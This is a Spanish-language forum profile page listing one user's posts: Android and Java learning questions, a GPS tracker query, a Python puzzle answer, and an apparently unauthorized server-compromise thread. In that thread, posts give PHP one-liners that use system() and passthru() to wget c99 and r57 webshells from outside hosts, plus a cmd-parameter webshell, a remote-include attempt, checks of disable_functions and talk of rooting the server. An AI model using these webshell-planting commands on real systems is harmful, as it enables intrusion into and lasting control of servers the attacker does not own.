Menú

Mostrar Mensajes

Esta sección te permite ver todos los mensajes escritos por este usuario. Ten en cuenta que sólo puedes ver los mensajes escritos en zonas a las que tienes acceso en este momento.

Mostrar Mensajes Menú

Mensajes - LKI

#21
Hola a todos espero que alguien pueda asesorarme. Mi idea es hacer un dispositivo de trackeo para mi auto he visto que voy a necesitar una antena gps y una antena gsm más una plaqueta arduino y demás componentes como baterias y un chip. ¿Ustedes que me podrían recomendar respecto a precio calidad para poder llevar a cabo este proyecto? ¿Hay algun kit que puedan recomendarme?.
Saludos.
#22
Gracias otra vez @No tienes permitido ver los links. Registrarse o Entrar a mi cuenta me pondre en campaña de estudiar Android con mucha perseverancia!!. Saludos!
#23
Descargando muchisimas gracias!
#24
No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
Hola @ LKI aquí tienes un post relacionado con lo que pides son 5GB de videotutoriales y material didáctico

No tienes permitido ver los links. Registrarse o Entrar a mi cuenta

Pero ya de entrada te preparo porque Android es un mundo aparte de lo que has conocido hasta ahora con Java, aparte de este post  te aconsejo otro que posteo anteriormente @No tienes permitido ver los links. Registrarse o Entrar a mi cuenta que fue con el que empecé y descargate también el de material design de @No tienes permitido ver los links. Registrarse o Entrar a mi cuenta está buenísimo.

Te puedo decir que si le tiras fuerte al material posteado aquí ,en menos de un mes estarás creando apk.

Suerte y fuerzas en tu camino hacia el conocimiento

Otra cosa que se me olvidó empieza con Eclipse y descarga los plugins adecuados y una vez te acomodes  y comprendas como funciona te aconsejo  Intellij
es una maravilla sobre todo a la hora de codear tiene una gran ayuda sintáctica.
Y empieza a acostumbrarte a taggear Strings en archivos xml, a manejar distintas dimensiones de imagen para poder visualizarlas en distintos tipos de pantalla,a como crear tu gui con los Layaouts, a las Apis de Android, al manejo de errores mientras codeas, a como dar los permisos a tus apks, en fin no me hago pesado tienes para entretenerte.

Muchisimas gracias Hu3c0, ya empecé a descargar lo que me señalaste, a propósito ¿por que señalaste que es recomendable utilizar Eclipse con los plugins para Android?. Tengo entendido que Android Studio es mucho mejor y he leído varias opiniones que lo recomiendan por sobre Eclipse ya que tiene el soporte oficial de Google.. ¿ Ultima pregunta en que orden me aconsejas empezar con estos materiales ?
#25
Hola underc0ders!!


Hola gente hermosa de underc0de, hoy vengo con una duda que me ha surgido recientemente, ya que un amigo me presento una idea para desarrollar una app Android, estilo red social instagram twitter... Yo soy desarrollador Java creo tener una base y conocimientos sólidos en este lenguaje pero nunca he desarrollado en Android a este nivel.. , se que desarrollar una app de este estilo conlleva mucho sacrificio, años dependiendo de las circunstancias, "pero no creo en los limites"..

Mi pregunta es la siguiente: ¿Que pasos me aconsejan realizar para llegar a obtener un nivel avanzado en desarrollo de apps Android?. Me refiero a pasos más que nada por que acudo a la experiencia de aquellas personas que han desarrollado e invertido mucho tiempo en el desarrollo Android, puntualmente necesito ahorrar la mayor cantidad de tiempo posible en cuanto a investigación, por eso necesitaria una excelente guia o libro que apunte justo al desarrollo avanzado y no se pierda en cuestiones que no me aportarían nada  a mi emprendimiento. "El tiempo es oro".

Desde ya saludos a toda la comunidad!.
PD: Espero con ansias sus respuestas..
#26
No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
@No tienes permitido ver los links. Registrarse o Entrar a mi cuenta proba subiendo este code tal cual y ejecutalo:

Código: php
<?php
system('wget http://www.c99shellphp.com/shell/c100.txt -O c100.php');
?>


luego te vas a la url y pones /c100.php y listo, te tiene que funcionar si o si yo lo probé en local y me funciono.

Saludos!, EPSILON



Funcionó muchas gracias!!!!!
Saludos en serio me ha servido mucho lo que me has enseñado!!
#27
No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
Esta todo bien, si podes tirar comandos por consola en ese servidor, por lo que yo diría que el código php esta mal embebido en la imagen entonces el servidor no lo interpreta como debería, entonces primero que nada te pregunto si elemental que uses ese tipo de bypass? osea si si o si tenes que bypassear el content-type? en una de esas con cambiar la extensión ya esta; y si no vas a tener que ver bien como metes el código php en la imagen esto que te paso es comuna a mi me paso un par de veces, proba con otras imágenes preferentemente *.gif y juga hasta que lo logres. y respecto a lo ultimo que me decías, ese script que queres ejecutar en el servidor es lo máximo que podes hacer sin ser root (tirar comandos) si queres comprometer mas el servidor tenes que tratar de rootearlo con algún exploit. Ahora bien yo te recomiendo que en vez de que andes tirando comandos te bajes en el servidor una webshell y listo, es lo mas cómodo para trabajar, podes probar con esto:

Código: php
<?php
passthru('wget http://www.r57shell.net/shell/r57.txt -O R57.php && chmod 777 R57.php');
?>


Obviamente si queres podes probar con otra webshell que te guste mas, con esto usas la funcion passthru() para ejecutar WGET, bajar una webshell .txt (si osi tiene que ser asi) y la renombra a .php, luego le da permisos de ejecución. Con esto directamente ejecutas la webshell desde la URL y chau.

Saludos!, EPSILON

Muchas gracias!! te comento todo lo que he ido descubriendo gracias a tu ayuda:
Probe el comando que descarga la shell y al ir a la ruta de la imagen con la extension .php la pantalla se quedaba en blanco y no se veia la shell..
Luego probe con el comando
Código: php
 <?php system($_GET['cmd']);?>
y funciono! ejecute el comando php?cmd= ls y vi una lista de imagenes subidas y sorpresivamente vi el archivo R57.php entre la lista trate de acceder a el via url y de vuelta se volvió a poner la pantalla en blanco sin dejarme entrar a la shell...

Ademas probe el comando :
Código: php
 <?php include($_GET["module"].".php"); ?> 


Y al tratar de acceder e incluir mi shell via No tienes permitido ver los links. Registrarse o Entrar a mi cuenta no respondió...


¿Alguna otra sugerencia?. Desde ya muchísimas gracias!
#28
Muchas gracias!!! Si la verdad que creo que el primer php estaba mal embebido...
Voy a probar con esa shell o con la c99 traducida que esta colgada acá en underc0de..
Voy a ver si puedo con otras extensiones como me dijiste y te cuento que tal va parece que todo va encaminado. Gracias!!
#29
No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
Puede ser que el servidor tenga desactivado por defecto las funciones que se utilizan para ejecutar comandos en php, para comprobar esto subi un script con:
Código: php
<?php
phpinfo();
?>


y fijate en la parte donde dice "disable_functions"



Si ves que la función system() aparece, no vas a poder utilizarla, como alternativa podrias probar por ejemplo passthru(), ahora bien si aparecen todas las funciones que te permitan ejecutar comandos vas a tener que probar algún tipo de bypass para poder utilizarlos xD.

O si no puede ser que no se este interpretando bien el script php porque esta embebido en una imagen, chekea que este punto y coma todo bien.

Saludos!, EPSILON

Revise lo que me dijiste aca te dejo la captura no aparece el comando system...



te dejo el texto por si no ves bien, estos son los que aparecen como disabled:
pcntl_alarm,pcntl_fork,pcntl_waitpid,pcntl_wait,pcntl_wifexited,pcntl_wifstopped,pcntl_wifsignaled,pcntl_wexitstatus,pcntl_wtermsig,pcntl_wstopsig,pcntl_signal,pcntl_signal_dispatch,pcntl_get_last_error,pcntl_strerror,pcntl_sigprocmask,pcntl_sigwaitinfo,pcntl_sigtimedwait,pcntl_exec,pcntl_getpriority,pcntl_setpriority,   pcntl_alarm,pcntl_fork,pcntl_waitpid,pcntl_wait,pcntl_wifexited,pcntl_wifstopped,pcntl_wifsignaled,pcntl_wexitstatus,pcntl_wtermsig,pcntl_wstopsig,pcntl_signal,pcntl_signal_dispatch,pcntl_get_last_error,pcntl_strerror,pcntl_sigprocmask,pcntl_sigwaitinfo,pcntl_sigtimedwait,pcntl_exec,pcntl_getpriority,pcntl_setpriority,

¿Ahora que tipo de comando podria incluir que comprometa aun mas la vulnerabilidad del servidor? y que entre en el poco campo de texto de los comentarios de una foto?
#30
Muchas gracias por tu respuesta! . En seguida te digo si funciona.
#31
Hola underc0ders tengo una duda sobre una vulnerabilidad..
He logrado subir mi shell a un servidor vulnerable, logre cambiar el formato de mi imagen jpg a .php.
Pero no se como ejecutarla o como se haría ya he probado con .php?cmd=ls y no ha funcionado....
Aclaro que el codigo php lo incruste en la sección de comentario del archivo jpg y luego logre cambiar su extension por php..
Saben como podria ejecutar mi codigo? si es correcto? o deberia buscar alguna otra shell?.

Desde ya muchas gracias a todos  los que deseen ayudarme , no tengo ningún fin malintencionado si logro vulnerar el servidor me comunicare con el webmaster para avisarle y que lo fixee.



PD: Buque en la sección pero no arrojo ningún resultado, por eso es que acudo a ustedes..
#32
Java / Re:Data image base64 [source] java
Diciembre 27, 2015, 12:52:54 AM
Excelente!!  8)
#33
Buenas muchas gracias a todos !! Muy cordiales sus respuestas por algo me gusta tanto underc0de  :)
Solo queda ponerse a practica y error, aprovecho para desearles felices fiestas y bendiciones para todos!!
Saludos gracias!  ;D :D
#34
Gracias genios!! a aprender se ha dicho  :)
#35
Buenas a todos, hoy les vengo a consultar ¿cual seria la forma mas recomendable de iniciarse en este lenguaje?. Tengo conocimiento de programación en C++, Java , (frameworks como Spring, JSF , Hibernate), conocimientos web html5, css3 , javascript, etc.

Quisiera iniciarme en este lenguaje para luego poder aprender algun framework como Laravel. Saludos a todos!
#36
Java / Re:[VIDEOTUTORIAL] Java Enterprise Edition
Septiembre 27, 2015, 05:44:25 PM
Descargando gracias !!
#37
Java / Re:Subir archivos con Servlet
Septiembre 25, 2015, 06:15:35 PM
Muy bueno se agradece tu aporte !! , seria bueno algun tuto con Spring MVC  :D

Saludos !
#38
No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
buenas,

Código: python

#stringtoConvert= raw_input("\n[+] Reto underc0de\nEnter string, please: ")
stringtoConvert= "qanwPVEAwnmSViNjTOLZPRRSaTAECnbArUjPmELcsWhdVMXYfdYLUGLpjLdOMdzvAEgfhXWNvRJZqMhlwocRPHKcwbUFJVjBjmLOwPVqjoYHLTtixQAnBHwuvfxDMPnAbpHBRNYTpKSzxLTWOusljvXidQjqbqjgcvpFMLbPPOkHdTTJbkswfdEeeFTbllerqvbFMpO"
stringtC= stringtoConvert.lower()
diccio= {}
resultado= ""
dicOrdenado= []
cMax= 0

for a in stringtC:
if not diccio.has_key(a):
diccio[a] = 1
elif diccio.has_key(a):
cont = (diccio[a]) + 1
diccio[a] = cont
if diccio[a] > cMax:
cMax = diccio[a]
ldic= diccio.items()
cDin= cMax

while len(dicOrdenado) != len(diccio):
cont= 0
for letra in ldic:
if letra[1] == cDin:
dicOrdenado.append(letra)
cont= cont + 1
cDin = cDin - 1
cDin= cMax

while len(resultado) != len(dicOrdenado):
mismoEquipo= []
for letra in dicOrdenado:
if letra[1] == cDin:
mismoEquipo.append(letra[0])
mismoEquipo= sorted(mismoEquipo)
for leter in mismoEquipo:
resultado= resultado +leter
cDin = cDin - 1
print resultado


sl2 :)


Es correcto !! Felicitaciones !!  ;D
#39
Java / Re:Juego del Gato para aprendices.
Septiembre 10, 2015, 11:55:40 PM
Muy buen código, muy limpio y ordenado es excelente cuando se respetan las convenciones  y se trabaja ordenadamente. Felicitaciones!
#40
Off Topic / Re:Guerra de cosas! ¿Qué elegís?
Septiembre 02, 2015, 01:03:22 PM
No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
HOLA!!!

MS-DOS , sin el WIN no existiria

Edison o Tesla?

GRACIAS POR LEER!!!

Edison

PHP o ASP?
JSP

¿ Java o C# ?